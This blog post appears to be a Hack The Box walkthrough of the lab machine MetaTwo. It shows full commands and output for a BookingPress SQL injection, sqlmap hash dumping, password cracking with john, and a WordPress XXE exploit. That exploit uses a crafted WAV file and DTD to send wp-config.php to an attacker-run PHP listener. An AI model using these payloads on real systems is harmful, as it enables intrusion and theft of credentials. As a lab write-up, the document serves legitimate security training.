---
layout: post
title: MetaTwo 
date: 2023-04-28 15:09:00
description: A walkthrough of Hack The Box's Metatwo.
tags: hack-the-box easy
categories: SQLi CVE wordpress

---
## Summary 

<div class="text-center">
    <div class="img-fluid">
        {% include figure.html path="assets/img/metatwo/MetaTwo.png" class="img-fluid rounded z-depth-1" zoomable=true %}
    </div>
</div>
[MetaTwo Hack The Box](https://app.hackthebox.com/machines/MetaTwo){:target="_blank"}{:rel="noopener noreferrer"}


In MetaTwo we first find a SQLi vulnerability.  We use the SQLi vulnerability to gain credentials to a wordpress admin dashboard.  We then make use of a an XXE vulnerability to read `wp_config.php` and obtain the credentials to the FTP server.  From the FTP server we obtain the credentials of the user.  Once logged in as the user we discover a command password manager and the private key the PW manager uses for encryption.  We are able to brut force the private key's password and use it to obtain root's password. Remove

## Port Scanning

`nmap` finds three pots open, FTP (21), SSH (22), and HTTP (80).  We also see that port 80 is redirecting us to `metapress.htb/`. 

{% highlight console  %}
┌──(kali 🛸 box)-[~/workSpace/Boxes/MetaTwo]
└─$ nmap -sC -sV 10.10.11.186        
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-22 06:39 EDT
Nmap scan report for 10.10.11.186
Host is up (0.028s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
21/tcp open  ftp?
| fingerprint-strings: 
|   GenericLines: 
|     220 ProFTPD Server (Debian) [::ffff:10.10.11.186]
|     Invalid command: try being more creative
|_    Invalid command: try being more creative
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 c4b44617d2102d8fec1dc927fecd79ee (RSA)
|   256 2aea2fcb23e8c529409cab866dcd4411 (ECDSA)
|_  256 fd78c0b0e22016fa050debd83f12a4ab (ED25519)
80/tcp open  http    nginx 1.18.0
|_http-title: Did not follow redirect to http://metapress.htb/
|_http-server-header: nginx/1.18.0
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port21-TCP:V=7.93%I=7%D=4/22%Time=6443B961%P=x86_64-pc-linux-gnu%r(Gene
SF:ricLines,8F,"220\x20ProFTPD\x20Server\x20\(Debian\)\x20\[::ffff:10\.10\
SF:.11\.186\]\r\n500\x20Invalid\x20command:\x20try\x20being\x20more\x20cre
SF:ative\r\n500\x20Invalid\x20command:\x20try\x20being\x20more\x20creative
SF:\r\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 210.05 seconds


{% endhighlight %}

ftp, and ssh are password protected let's add `metapress.htb` to `/etc/hosts` and run `nmap` again on port 80.

{% highlight console %}
┌──(kali 🛸 box)-[~/workSpace/Boxes/MetaTwo]
└─$ nmap -sC -sV 10.10.11.186 -p 80
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-23 13:18 EDT
Nmap scan report for metapress.htb (10.10.11.186)
Host is up (0.026s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    nginx 1.18.0
|_http-generator: WordPress 5.6.2
|_http-title: MetaPress &#8211; Official company site
|_http-trane-info: Problem with XML parsing of /evox/about
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-robots.txt: 1 disallowed entry 
|_/wp-admin/
|_http-server-header: nginx/1.18.0

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.18 seconds


{% endhighlight %}

We see the website was built using WordPress version 5.6.2 and wp-admin is listed in robots.txt.

## Checking out the website

We see we have a wordpress website with the ability to sign up for a "launch event"
<div class="row mt-3">
    <div class="col-sm mt-3 mt-md-0">
        {% include figure.html path="assets/img/metatwo/m1.png" class="img-fluid rounded z-depth-1" zoomable=true %}
    </div>
    <div class="col-sm mt-3 mt-md-0">
        {% include figure.html path="assets/img/metatwo/m2.png" class="img-fluid rounded z-depth-1" zoomable=true %}
    </div>
</div>
Looking at robots.txt we find the wp-admin page.
<div class="row mt-3">
    <div class="col-sm mt-3 mt-md-0">
        {% include figure.html path="assets/img/metatwo/m6.png" class="img-fluid rounded z-depth-1" zoomable=true %}
    </div>
    <div class="col-sm mt-3 mt-md-0">
        {% include figure.html path="assets/img/metatwo/m7.png" class="img-fluid rounded z-depth-1" zoomable=true %}
    </div>
</div>

Navigating to events we create an event and look at the traffic through burp. Looking at the post data we see the wordpress plugin BookingPress is being used.
<div class="row mt-3">
    <div class="col-sm mt-3 mt-md-0">
        {% include figure.html path="assets/img/metatwo/m3.png" class="img-fluid rounded z-depth-1" zoomable=true %}
    </div>
    <div class="col-sm mt-3 mt-md-0">
        {% include figure.html path="assets/img/metatwo/m4.png" class="img-fluid rounded z-depth-1" zoomable=true %}
    </div>
</div>

A quick google search reveals that various version of BookingPress are vulnerable to CVE-2022-0739 and a POC is available for this cve.

CVE-2022-0739 - BookingPress before 1.0.11 SQL Injection

epss score: .00494

epss percentile: .72665

cvss base score: 9.8

[POC](https://wpscan.com/vulnerability/388cd42d-b61a-42a4-8604-99b812db2357){:target="_blank"}{:rel="noopener noreferrer"}

## Exploiting CVE-2022-0739

Following the instructions in the POC for CVE-2022-0739 we are able to verify the website is vulnerable to the SQLi.

{% highlight console  %}
┌──(kali 🛸 box)-[~/workSpace/Boxes/MetaTwo]
└─$ curl -i 'http://metapress.htb/wp-admin/admin-ajax.php' \
--data 'action=bookingpress_front_get_category_services&_wpnonce=6027d5fa3e&category_id=33&total_service=-7502) UNION ALL SELECT @@version,@@version_comment,@@version_compile_os,1,2,3,4,5,6-- -'
HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Sat, 22 Apr 2023 17:54:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.0.24
X-Robots-Tag: noindex
X-Content-Type-Options: nosniff
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Frame-Options: SAMEORIGIN
Referrer-Policy: strict-origin-when-cross-origin

[{"bookingpress_service_id":"10.5.15-MariaDB-0+deb11u1","bookingpress_category_id":"Debian 11","bookingpress_service_name":"debian-linux-gnu","bookingpress_service_price":"$1.00","bookingpress_service_duration_val":"2","bookingpress_service_duration_unit":"3","bookingpress_service_description":"4","bookingpress_service_position":"5","bookingpress_servicedate_created":"6","service_price_without_currency":1,"img_url":"http:\/\/metapress.htb\/wp-content\/plugins\/bookingpress-appointment-booking\/images\/placeholder-img.jpg"}]  

{% endhighlight %}


From the poc we see that the post variable `total_service` is vulnerable.  Let's have `sqlmap` do the leg work of enumerating the Maria database for us.  

We pass the poc through our proxy.  

{% highlight console  %}
┌──(kali 🛸 box)-[~/workSpace/Boxes/MetaTwo]
└─$  curl -i 'http://metapress.htb/wp-admin/admin-ajax.php' \
--data 'action=bookingpress_front_get_category_services&_wpnonce=6027d5fa3e&category_id=33&total_service=-7502) UNION ALL SELECT @@version,@@version_comment,@@version_compile_os,1,2,3,4,5,6-- -' -x localhost:8080

{% endhighlight %}

We save the request to a file called `requests.txt`

<div class="text-center">
    <div class="img-fluid">
        {% include figure.html path="assets/img/metatwo/m5.png" class="img-fluid rounded z-depth-1" zoomable=true %}
    </div>
</div>

{% highlight console  %}
┌──(kali 🛸 box)-[~/workSpace/Boxes/MetaTwo]
└─$  sqlmap -r requests.txt --level 4 --risk 3 --batch -p total_service                                                                                                                                                                    1 ⨯
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.7.2#stable}
|_ -| . [,]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 14:15:59 /2023-04-22/

[14:15:59] [INFO] parsing HTTP request from 'requests.txt'
[14:15:59] [WARNING] it appears that you have provided tainted parameter values ('total_service=-7502) UNION ALL SELECT @@version,@@version_comment,@@version_compile_os,1,2,3,4,5,6-- -') with most likely leftover chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to run properly
are you really sure that you want to continue (sqlmap could have problems)? [y/N] N

{% endhighlight %}

`sqlmap` yells at us for already having a tainted parameter value for our vulnerable variable.  Let's change that value to something "normal."

Corrected `requests.txt`

{% highlight console  %}
┌──(kali 🛸 box)-[~/workSpace/Boxes/MetaTwo]
└─$  cat requests.txt 
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: metapress.htb
User-Agent: curl/7.88.1
Accept: */*
Content-Length: 185
Content-Type: application/x-www-form-urlencoded
Connection: close

action=bookingpress_front_get_category_services&_wpnonce=6027d5fa3e&category_id=33&total_service=35

{% endhighlight %}

Running `sqlmap` again we find a few different payloads that will work on the vulnerable parameter.

{% highlight console  %}
┌──(kali 🛸 box)-[~/workSpace/Boxes/MetaTwo]
└─$  sqlmap -r requests.txt --level 4 --risk 3 --batch -p total_service                                           
        ___                                                                                                            
       __H__                                                                                                           
 ___ ___[,]_____ ___ ___  {1.7.2#stable}                                                                               
|_ -| . [)]     | .'| . |                                                                                              
|___|_  [.]_|_|_|__,|  _|                                                                                              
      |_|V...       |_|   https://sqlmap.org                                                                           
                                                                                                                       
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not resp
onsible for any misuse or damage caused by this program                                                                
                                                                                                                       
[*] starting @ 14:22:13 /2023-04-22/                                                                                   
                                                                                                                       
[14:22:13] [INFO] parsing HTTP request from 'requests.txt'
[14:22:13] [INFO] testing connection to the target URL
[14:22:13] [INFO] checking if the target is protected by some kind of WAF/IPS
[14:22:13] [INFO] testing if the target URL content is stable
[14:22:14] [INFO] target URL content is stable                                                                         
[14:22:14] [WARNING] heuristic (basic) test shows that POST parameter 'total_service' might not be injectable
[14:22:14] [INFO] testing for SQL injection on POST parameter 'total_service'   
[14:22:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'


abridged
[14:22:18] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[14:22:28] [INFO] POST parameter 'total_service' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
[14:22:28] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[14:22:28] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[14:22:30] [INFO] target URL appears to be UNION injectable with 9 columns
[14:22:30] [INFO] POST parameter 'total_service' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
[14:22:30] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
POST parameter 'total_service' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 113 HTTP(s) requests:
---
Parameter: total_service (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: action=bookingpress_front_get_category_services&_wpnonce=6027d5fa3e&category_id=33&total_service=-8156) OR 5081=5081-- tPXv

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: action=bookingpress_front_get_category_services&_wpnonce=6027d5fa3e&category_id=33&total_service=35) AND (SELECT 1109 FROM (SELECT(SLEEP(5)))swTx)-- ZRxp

    Type: UNION query
    Title: Generic UNION query (NULL) - 9 columns
    Payload: action=bookingpress_front_get_category_services&_wpnonce=6027d5fa3e&category_id=33&total_service=35) UNION ALL SELECT NULL,CONCAT(0x716a6b6b71,0x4d774f774d6e4743426574644f74575a4d656257414b696771634151414866424d44465450446245,0x71717a7a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
[14:22:30] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.18.0, PHP 8.0.24
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[14:22:30] [INFO] fetched data logged to text files under '/home/kali/.sqlmap/output/metapress.htb'

[*] ending @ 14:22:30 /2023-04-22/

{% endhighlight %}

After searching around we find password hashes in the table wp-users in database blog

{% highlight console  %}
┌──(kali 🛸 box)-[~/workSpace/Boxes/MetaTwo]
└─$  sqlmap -r requests.txt --dbs -v 0
...
web application technology: Nginx 1.18.0, PHP 8.0.24
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
available databases [2]:
[*] blog
[*] information_schema

┌──(kali 🛸 box)-[~/workSpace/Boxes/MetaTwo]
└─$  sqlmap -r requests.txt --tables -D blog -v 0
...
[27 tables]
+--------------------------------------+
| wp_bookingpress_appointment_bookings |
| wp_bookingpress_categories           |
| wp_bookingpress_customers            |
| wp_bookingpress_customers_meta       |
| wp_bookingpress_customize_settings   |
| wp_bookingpress_debug_payment_log    |
| wp_bookingpress_default_daysoff      |
| wp_bookingpress_default_workhours    |
| wp_bookingpress_entries              |
| wp_bookingpress_form_fields          |
| wp_bookingpress_notifications        |
| wp_bookingpress_payment_logs         |
| wp_bookingpress_services             |
| wp_bookingpress_servicesmeta         |
| wp_bookingpress_settings             |
| wp_commentmeta                       |
| wp_comments                          |
| wp_links                             |
| wp_options                           |
| wp_postmeta                          |
| wp_posts                             |
| wp_term_relationships                |
| wp_term_taxonomy                     |
| wp_termmeta                          |
| wp_terms                             |
| wp_usermeta                          |
| wp_users                             |
+--------------------------------------+

┌──(kali 🛸 box)-[~/workSpace/Boxes/MetaTwo]
└─$  sqlmap -r requests.txt --dump -T wp_users -D blog -v 0
...
------+------------------------------------+-----------------------+------------+-------------+--------------+---------------+---------------------+---------------------+
| ID | user_url             | user_pass                          | user_email            | user_login | user_status | display_name | user_nicename | user_registered     | user_activation_key |
+----+----------------------+------------------------------------+-----------------------+------------+-------------+--------------+---------------+---------------------+---------------------+
| 1  | http://metapress.htb | $P$BGrGrgf2wToBS79i07Rk9sN4Fzk.TV. | admin@metapress.htb   | admin      | 0           | admin        | admin         | 2022-06-23 17:58:28 | <blank>             |
| 2  | <blank>              | $P$B4aNM28N0E.tMy/JIcnVMZbGcU16Q70 | manager@metapress.htb | manager    | 0           | manager      | manager       | 2022-06-23 18:07:55 | <blank>             |
+----+----------------------+------------------------------------+-----------------------+------------+-------------+--------------+---------------+---------------------+---------------------+


{% endhighlight %}

We use `john the ripper` on both hashes but using the word list `rockyou` we are only able to crack the hash for the manager.

{% highlight console  %}
┌──(kali 🛸 box)-[~/workSpace/Boxes/MetaTwo]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash2.txt
Using default input encoding: UTF-8
Loaded 1 password hash (phpass [phpass ($P$ or $H$) 128/128 AVX 4x3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
partylikearockstar (?)     
1g 0:00:00:04 DONE (2023-04-22 14:40) 0.2475g/s 27326p/s 27326c/s 27326C/s poochini..onelove7
Use the "--show --format=phpass" options to display all of the cracked passwords reliably
Session completed. 

{% endhighlight %}

## Logging into WordPress Admin

Heading back to `http://metapress.htb/wp-admin` we are able to login with `manager:partylikearockstar`.

<div class="row mt-3">
    <div class="col-sm mt-3 mt-md-0">
        {% include figure.html path="assets/img/metatwo/m8.png" class="img-fluid rounded z-depth-1" zoomable=true %}
    </div>
    <div class="col-sm mt-3 mt-md-0">
        {% include figure.html path="assets/img/metatwo/m9.png" class="img-fluid rounded z-depth-1" zoomable=true %}
    </div>
</div>

Browsing the admin console we find we have the ability to upload a media file.  A google search shows CVE-2021-29447 XXE attack impacting WordPress version 5.6 - 5.7 running php 8.  This CVE was patched in version 5.7.1.  Our enumeration has found that this website is using WordPress 5.6.2 and php 8 and therefore likely vulnerable to this cve.

CVE-2021-29447 - Media Library XXE Vulnerability 

epss score: .00562

epss percentile: .7436

cvss base score: 7.1

[POC](https://exploit-notes.hdks.org/exploit/web/cms/wordpress-pentesting/){:target="_blank"}{:rel="noopener noreferrer"}

## Exploiting CVE-2021-29447

Using the poc above we read a few well known files.  By reading `/etc/passwd` we find the username `jnelson`.  Finally we read wp-config.php with the following configuration of the exploit. 

**exploit.wav**, **exploit.dtd**, and **index.php**

{% highlight console %}
┌──(kali 🛸 box)-[~/workSpace/Boxes/MetaTwo]
└─$ echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://10.10.14.2:9001/exploit.dtd'"'"'>%remote;%init;%trick;] >\x00'> exploit.wav

┌──(kali 🛸 box)-[~/workSpace/Boxes/MetaTwo]
└─$ cat exploit.dtd   
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=../wp-config.php">
<!ENTITY % init "<!ENTITY &#x25; trick SYSTEM 'http://10.10.14.2:9001/?p=%file;'>">

┌──(kali 🛸 box)-[~/workSpace/Boxes/MetaTwo]
└─$ cat index.php   
<?php 
$myfile = fopen("tempfile.txt", "w") or die("unable to open file!");
$fixed = str_replace(' ', '+', $_GET['p']);
fwrite($myfile, zlib_decode(base64_decode($fixed)))
?>

{% endhighlight %}

Start php server

{% highlight console %}
┌──(kali 🛸 box)-[~/workSpace/Boxes/MetaTwo]
└─$ php -S 0.0.0.0:9001

[Mon Apr 24 09:06:14 2023] PHP 8.2.2 Development Server (http://0.0.0.0:9001) started

{% endhighlight %}

Upload exploit.wav

<div class="text-center">
    <div class="img-fluid">
        {% include figure.html path="assets/img/metatwo/m11.png" class="img-fluid rounded z-depth-1" zoomable=true %}
    </div>
</div>

This saved wp-config.php to tempfile.txt.  From wp_config.php we find ftp credentials.

{% highlight console %}
┌──(kali 🛸 box)-[~/workSpace/Boxes/MetaTwo]
└─$ cat tempfile.txt

...

define( 'FTP_USER', 'metapress.htb' );
define( 'FTP_PASS', '9NYS_ii@FyL_p5M2NvJ' );

...

{% endhighlight %}

## Enumerating FTP

Logging into the ftp server using the credentials we found in wp-config.php, we are able to find the user's credentials for `jnelson` in the file `send_email.php`.

{% highlight console %}
┌──(kali 🛸 box)-[~/workSpace/Boxes/MetaTwo]
└─$ ftp $(cat ip)
Connected to 10.10.11.186.
220 ProFTPD Server (Debian) [::ffff:10.10.11.186]
Name (10.10.11.186:kali): metapress.htb
331 Password required for metapress.htb
Password: 
230 User metapress.htb logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||1341|)
150 Opening ASCII mode data connection for file list
drwxr-xr-x   5 metapress.htb metapress.htb     4096 Oct  5  2022 blog
drwxr-xr-x   3 metapress.htb metapress.htb     4096 Oct  5  2022 mailer
226 Transfer complete
ftp> cd mailer
250 CWD command successful
ftp> ls
229 Entering Extended Passive Mode (|||9274|)
150 Opening ASCII mode data connection for file list
drwxr-xr-x   4 metapress.htb metapress.htb     4096 Oct  5  2022 PHPMailer
-rw-r--r--   1 metapress.htb metapress.htb     1126 Jun 22  2022 send_email.php
226 Transfer complete
ftp> get send_email.php

{% endhighlight %}

{% highlight console %}
┌──(kali 🛸 box)-[~/workSpace/Boxes/MetaTwo]
└─$ cat send_email.php 
<?php
/*
 * This script will be used to send an email to all our users when ready for launch
*/
...


$mail->Host = "mail.metapress.htb";
$mail->SMTPAuth = true;                          
$mail->Username = "jnelson@metapress.htb";                 
$mail->Password = "Cb4_JmWM8zUZWMu@Ys";                           
$mail->SMTPSecure = "tls";                           
$mail->Port = 587;                                   

...

┌──(kali 🛸 box)-[~/workSpace/Boxes/MetaTwo]
└─$ ssh jnelson@10.10.11.186        
jnelson@10.10.11.186's password: 
Linux meta2 5.10.0-19-amd64 #1 SMP Debian 5.10.149-2 (2022-10-21) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Oct 25 12:51:26 2022 from 10.10.14.23
jnelson@meta2:~$ 

{% endhighlight %}

## Root

In the home directory of jnelson we find `.passpie`.  

{% highlight console %}
jnelson@meta2:~$ ls -la
total 32
drwxr-xr-x 4 jnelson jnelson 4096 Oct 25 12:53 .
drwxr-xr-x 3 root    root    4096 Oct  5  2022 ..
lrwxrwxrwx 1 root    root       9 Jun 26  2022 .bash_history -> /dev/null
-rw-r--r-- 1 jnelson jnelson  220 Jun 26  2022 .bash_logout
-rw-r--r-- 1 jnelson jnelson 3526 Jun 26  2022 .bashrc
drwxr-xr-x 3 jnelson jnelson 4096 Oct 25 12:51 .local
dr-xr-x--- 3 jnelson jnelson 4096 Oct 25 12:52 .passpie
-rw-r--r-- 1 jnelson jnelson  807 Jun 26  2022 .profile
-rw-r----- 1 root    jnelson   33 Apr 24 13:40 user.txt

{% endhighlight %}

During manual enumeration of the directory we find `~/.passpie/ssh/root.pass` which appears to contain a PGP encrypted secret that looks like the password for root.

{% highlight console %}
jnelson@meta2:~/.passpie$ cat ssh/root.pass 
comment: ''
fullname: root@ssh
login: root
modified: 2022-06-26 08:58:15.621572
name: ssh
password: '-----BEGIN PGP MESSAGE-----


  hQEOA6I+wl+LXYMaEAP/T8AlYP9z05SEST+Wjz7+IB92uDPM1RktAsVoBtd3jhr2

  nAfK00HJ/hMzSrm4hDd8JyoLZsEGYphvuKBfLUFSxFY2rjW0R3ggZoaI1lwiy/Km

  yG2DF3W+jy8qdzqhIK/15zX5RUOA5MGmRjuxdco/0xWvmfzwRq9HgDxOJ7q1J2ED

  /2GI+i+Gl+Hp4LKHLv5mMmH5TZyKbgbOL6TtKfwyxRcZk8K2xl96c3ZGknZ4a0Gf

  iMuXooTuFeyHd9aRnNHRV9AQB2Vlg8agp3tbUV+8y7szGHkEqFghOU18TeEDfdRg

  krndoGVhaMNm1OFek5i1bSsET/L4p4yqIwNODldTh7iB0ksB/8PHPURMNuGqmeKw

  mboS7xLImNIVyRLwV80T0HQ+LegRXn1jNnx6XIjOZRo08kiqzV2NaGGlpOlNr3Sr

  lpF0RatbxQGWBks5F3o=

  =uh1B

  -----END PGP MESSAGE-----

  '
{% endhighlight %}

Additionally, we find a private PGP key located in `~/.passpie/.keys`.

{% highlight console %}
jnelson@meta2:~/.passpie$ ls -la
total 24
dr-xr-x--- 3 jnelson jnelson 4096 Oct 25 12:52 .
drwxr-xr-x 4 jnelson jnelson 4096 Oct 25 12:53 ..
-r-xr-x--- 1 jnelson jnelson    3 Jun 26  2022 .config
-r-xr-x--- 1 jnelson jnelson 5243 Jun 26  2022 .keys
dr-xr-x--- 2 jnelson jnelson 4096 Oct 25 12:52 ssh

{% endhighlight %}

We copy over the private PGP key and use `john` to crack the password for the key.

{% highlight console %}
┌──(kali 🛸 box)-[~/workSpace/Boxes/MetaTwo/root2]
└─$ vi private_key  
┌──(kali 🛸 box)-[~/workSpace/Boxes/MetaTwo/root2]
└─$ gpg2john private_key >private_key_hash

File private_key
┌──(kali 🛸 box)-[~/workSpace/Boxes/MetaTwo/root2]
└─$ cat private_key_hash 
Passpie:$gpg$*17*54*3072*e975911867862609115f302a3d0196aec0c2ebf79a84c0303056df921c965e589f82d7dd71099ed9749408d5ad17a4421006d89b49c0*3*254*2*7*16*21d36a3443b38bad35df0f0e2c77f6b9*65011712*907cb55ccb37aaad:::Passpie (Auto-generated by Passpie) <passpie@local>::private_key
┌──(kali 🛸 box)-[~/workSpace/Boxes/MetaTwo/root2]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt private_key_hash 
Using default input encoding: UTF-8
Loaded 1 password hash (gpg, OpenPGP / GnuPG Secret Key [32/64])
Cost 1 (s2k-count) is 65011712 for all loaded hashes
Cost 2 (hash algorithm [1:MD5 2:SHA1 3:RIPEMD160 8:SHA256 9:SHA384 10:SHA512 11:SHA224]) is 2 for all loaded hashes
Cost 3 (cipher algorithm [1:IDEA 2:3DES 3:CAST5 4:Blowfish 7:AES128 8:AES192 9:AES256 10:Twofish 11:Camellia128 12:Camellia192 13:Camellia256]) is 7 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
blink182         (Passpie)     
1g 0:00:00:03 DONE (2023-04-24 10:46) 0.3164g/s 51.89p/s 51.89c/s 51.89C/s ginger..blink182
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

{% endhighlight %}

Using an online PGP decrypter we are able to find the password for root using the previously discovered pgp message in `root.pass`, private key in `.keys`, and the password `blink182`.

<div class="text-center">
    <div class="img-fluid">
        {% include figure.html path="assets/img/metatwo/12.png" class="img-fluid rounded z-depth-1" zoomable=true %}
    </div>
</div>

We can now su to root.
{% highlight console %}
jnelson@meta2:~/.passpie$ su root
Password: 
root@meta2:/home/jnelson/.passpie# whoami
root
root@meta2:/home/jnelson/.passpie# id
uid=0(root) gid=0(root) groups=0(root)

{% endhighlight%}
